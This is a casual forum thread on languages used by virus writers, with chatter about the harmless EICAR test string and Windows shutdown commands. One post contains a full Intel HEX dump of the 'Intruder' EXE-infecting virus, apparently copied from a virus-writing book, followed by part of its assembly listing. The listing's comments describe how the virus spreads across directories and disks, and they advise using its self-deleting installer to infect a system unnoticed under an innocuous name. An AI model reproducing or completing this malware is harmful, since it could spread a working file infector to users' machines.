Language of Virus Writers

[plasmafire]

lolz.. i love ASM embedded in C 4 destructive things (formatting, burning chips,platters etc)
VB for minor annoyances.
C++ for DOS attacks & other n/w attacks..

love it!!

 

[khattam_]

Copy the Contents from below, paste it to notepad, save the file and scan it with an antivirus (i used Kaspersky)........

-----------------------Cut from here-------------------------------
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
Echo `Virus in a Notepad`
cls
echo 'lol
echo 'Virus
echo 'I'm _khAttAm_
echo save it as a text file.....................
echo 'LOL
------------------------Cut from here-------------------------------

It should be treated as a virus. My Kaspersky does treat it as a virus. Hehe, but it is NOT a virus and does not ham to your computer.

 

[qarch]

Hi every one! Are you trying to make a virus writer out of the thread initiator Satissh S?

 

[BONZI]

These are not harmful man . Its just a prank.

 

[Ashootosh]

sorry khattam I was not here to answer u. I think u r a bit confused, the problem was not mine , i was not the one who started this thread n i was quite surprised 2 c a lame person callin me lame.

n i agree wid bonzi, these little tricks r just 4 fun not actual harmful viruses........

 

[girish_b]

solution is->-> shutdown -a
it will stop pc from shutting down

try shutdown/? for more commands

xp has many hidden features try explore all those

Not a very good solution.............. This has to be done every time you restart and if the command is in the Batch file, not sure if it works........................
Deleting the Batch file or editing the line containing the Shutdown command will do..............

one best place to find all of these command parameters are windows xp help and support.

 

[Ashootosh]

u can also find alot of these commands in system32 directory
just go there from cmd n type --- dir *.exe/p
u will find some more interesting commands like tsshutdn (u can even turn off comp in a LAN) etc etc

 

[Satissh S]

Hey Guys I saw the the following in a book "How do Viruses Work.The hexadecimal liasting of the intruder virus is as follows:

:100000004D5A47000500020020001100FFFF650067
:100010000001259E0C0112001E00000001003401A9
:100020001200480112000000000000000000000063
:1000300000000000000000000000000000000000C0
:1000400000000000000000000000000000000000B0
:1000500000000000000000000000000000000000A0
:100060000000000000000000000000000000000090
:100070000000000000000000000000000000000080
:100080000000000000000000000000000000000070
:100090000000000000000000000000000000000060
:1000A0000000000000000000000000000000000050
:1000B0000000000000000000000000000000000040
:1000C0000000000000000000000000000000000030
:1000D0000000000000000000000000000000000020
:1000E0000000000000000000000000000000000010
:1000F0000000000000000000000000000000000000
:1001000000000000000000000000000000000000EF
:1001100000000000000000000000000000000000DF
:1001200000000000000000000000000000000000CF
:1001300000000000000000000000000000000000BF
:1001400000000000000000000000000000000000AF
:10015000000000000000000000000000000000009F
:10016000000000000000000000000000000000008F
:10017000000000000000000000000000000000007F
:10018000000000000000000000000000000000006F
:10019000000000000000000000000000000000005F
:1001A000000000000000000000000000000000004F
:1001B000000000000000000000000000000000003F
:1001C000000000000000000000000000000000002F
:1001D000000000000000000000000000000000001F
:1001E000000000000000000000000000000000000F
:1001F00000000000000000000000000000000000FF
:10020000494E5452554445522E455845008CC88E8F
:10021000D8BA0000B441CD21B44CB000CD210000CB
:1002200000000000000000000000000000000000CE
:1002300000000000000000000000000000000000BE
:1002400000000000000000000000000000000000AE
:10025000000000000000000000000000000000009E
:10026000000000000000000000000000000000008E
:10027000000000000000000000000000000000007E
:10028000000000000000000000000000000000006E
:10029000000000000000000000000000000000005E
:1002A000000000000000000000000000000000004E
:1002B000000000000000000000000000000000003E
:1002C000000000000000000000000000000000002E
:1002D000000000000000000000000000000000001E
:1002E000000000000000000000000000000000000E
:1002F00000000000000000000000000000000000FE
:1003000000000000000000000000000000000000ED
:1003100000000000000000000000000000000000DD
:10032000AAC800000000000000000000000000005B
:1003300000000000000000000000000000000000BD
:1003400000000000000000000000000000000000AD
:10035000000000000000000000000000000000009D
:10036000000000000000000000000000000000008D
:10037000000000000000000000000000000000007D
:10038000000000000000000000000000000000006D
:10039000000000000000000000000000000000005D
:1003A000000000000000000000000000000000004D
:1003B000000000000000000000000000000000003D
:1003C0000000005C2A2E455845005C2A2E2A0000B9
:1003D000000000000000000000000000000000001D
:1003E000000000000000000000000000000000000D
:1003F00000000000000000000000000000000000FD
:1004000000000000000000000000000000000000EC
:1004100000000000000000000000000000000000DC
:10042000000000000000000000000001508CC88E99
:10043000D88CC0A30400E867037518E86B03E86E66
:1004400003E826007509E89103E8E401E8CE03E833
:10045000760358BB0200FA8ED3BC00018E0604005E
:100460008E1E0400FBEA0D000000B05CA2AF00BECF
:10047000B00032D2B447CD21803EB00000750532C5
:10048000C0A2AF00B002A2FD00E81000740D32C09F
103 The Little Black Book of Computer Viruses
:10049000A2AF00FEC0A2FD00E80100C3E851007356
:1004A0004C803EFD0000743FFE0EFD00BFAF00BE5D
:1004B000AA00E8BB004757E8760075235F32C0AA60
:1004C000BFAF00BB4F00A0FD00B22BF6E203D88BFC
:1004D000F3E89C0057E8C4FF7412E8760074DDFE70
:1004E00006FD005F32C0AAB0010AC0C35F32C0C3BC
:1004F000BA0600B41ACD21BFAF00BEA300E8700059
:1005000057BAAF00B93F00B44ECD210AC075195F8C
:1005100047AABFAF00BE2400E855004F57E863006C
:10052000730CB44FCD21EBE35FC60500F9C35FC385
:10053000E8310052B41ACD21BAAF00B91000B44E60
:10054000CD215B0AC0751CF64715107406807F1E0E
:100550002E750EE80E0052B41ACD21B44FCD21EB0A
:10056000E132C0C3BA3100B02BF626FD0003D0C380
:10057000268A05470AC075F84F57FCACAA0AC07511
:10058000F95FC3E82300720DE80B007208E833003E
:100590007203E84500C3B04DB45A3B0687007402AD
:1005A000F9C333C02B06A100C3BAAF00B8023DCDDA
:1005B00021720FA3FE008BD8B91C00BA8700B43F8C
:1005C000CD21C3A18F0003C003C02B068D0003C043
:1005D00003C02B069F003D0800C3A19D0003068FAA
:1005E00000BA1000F7E28BCA8BD08B1EFE00B80059
:1005F00042CD21B43F8B1EFE00BA0901B90200CDE5
:1006000021720BA109013B060000F87501F9C3A096
:100610000501240F7419B910002AC8BA2705010E64
:10062000050183160701008B1EFE00B440CD21C3D7
:100630008B0E07018B1605018B1EFE00B80042CD04
:1006400021E8CBFFB9270533D28B1EFE00B440CD85
:10065000218B1605018B0E0701BB33014303D3BB6E
:10066000000013CB8B1EFE00B80042CD21BA9500CE
:100670008B1EFE00B90200B440CD218B1605018B04
:100680000E0701BB39014303D3BB000013CB8B1E04
:10069000FE00B80042CD21BA97008B1EFE00B902C1
:1006A00000B440CD218B1605018B0E0701BB45011F
:1006B00083C30103D3BB000013CB8B1EFE00B80025
:1006C00042CD21BA9B008B1EFE00B90400B440CD80
:1006D0002133C933D28B1EFE00B80042CD21A105C3
:1006E00001B104D3E88B1E070180E30FB104D2E30C
:1006F00002E32B068F00A39D00BB270583C310B127
:1007000004D3EB03C3A39500B80C01A39B00B8006E
:1007100001A397008B160701A10501BB270503C3A1
:1007200033DB13D305000213D350B109D3E8B1076B
:10073000D3E203C2A38B005825FF01A38900B802AE
:100740000001068D00B91C00BA87008B1EFE00B4A4
:1007500040CD21A18D004848BB0400F7E303069F6C
:1007600000BB000013D38BCA8BD08B1EFE00B800D9
:1007700042CD21A19D00BB330143891E8700A3897F
:1007800000A19D00BB450183C303891E8B00A38D7F
:1007900000B90800BA87008B1EFE00B440CD21C30B
:1007A00032E4C3CD1A80E200C3B090A28204C3B485
:1007B0002FCD21891E02008CC0A304008CC88EC0DE
:1007C000BA0600B41ACD21C38B160200A104008E14
The INTRUDER Virus 104
:1007D000D8B41ACD218CC88ED8C3B443B000BAAFF8
:1007E00000CD21880E0001B443B001BAAF00B100C2
:1007F000CD21BAAF00B002B43DCD21A3FE00B45765
:1008000032C08B1EFE00CD21890E01018916030125
:10081000A12200A30701A12000A30501C38B160399
:10082000018B0E0101B457B0018B1EFE00CD21B427
:100830003E8B1EFE00CD218A0E000132EDB443B086
:0708400001BAAF00CD21C396
:00000001FF
The assembly language listing of the Intruder virus follows:
;The Intruder Virus is an EXE file infector which can jump from directory to
;directory and disk to disk. It attaches itself to the end of a file and
;modifies the EXE file header so that it gets control first, before the host
;program. When it is done doing its job, it passes control to the host program,
;so that the host executes without a hint that the virus is there.
.SEQ ;segments must appear in sequential order
;to simulate conditions in active virus
;MGROUP GROUP HOSTSEG,HSTACK ;Host segments grouped together
;HOSTSEG program code segment. The virus gains control before this routine and
;attaches itself to another EXE file. As such, the host program for this
;installer simply tries to delete itself off of disk and terminates. That is
;worthwhile if you want to infect a system with the virus without getting
;caught. Just execute the program that infects, and it disappears without a
;trace. You might want to name the program something more innocuous, though.
HOSTSEG SEGMENT BYTE
ASSUME CS:HOSTSEG,SS:HSTACK
PGMSTR DB ’INTRUDER.EXE’,0
HOST:
mov ax,cs ;we want DS=CS here
mov ds,ax
mov dx,OFFSET PGMSTR
mov ah,41H
int 21H ;delete this exe file
mov ah,4CH
mov al,0
int 21H ;terminate normally
HOSTSEG ENDS
;Host program stack segment
HSTACK SEGMENT PARA STACK
db 100H dup (?) ;100 bytes long
HSTACK ENDS


What do the above lines convey?

 

[visvo]

Hey ! You can read Ankit Fadia'z " Unoffical Guide to Ethical Hacking" or check him online at www.ankitfadia.com, this delhi guy has got all the ans of your Questions. in his Book

 

[maverickrohan]

@Khattam

dude....that "X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*" is just a virus signature..........without the body obvio its not the complete virus.........dont tell ppl to try such silly stuff..........u can put thousands of signatures in notepad n scan them n itl ve detected as a virus.............

P.S. : there was no need for u to add the remaining lines...........

Well Python is one more language used by virus writers.......


@satis
thats just a HEX dump uv posted ot ther........u need to reverse engineer it to figure out what it means...

@<everyone>
try

www.exetools.com for some intersting stuff...!!!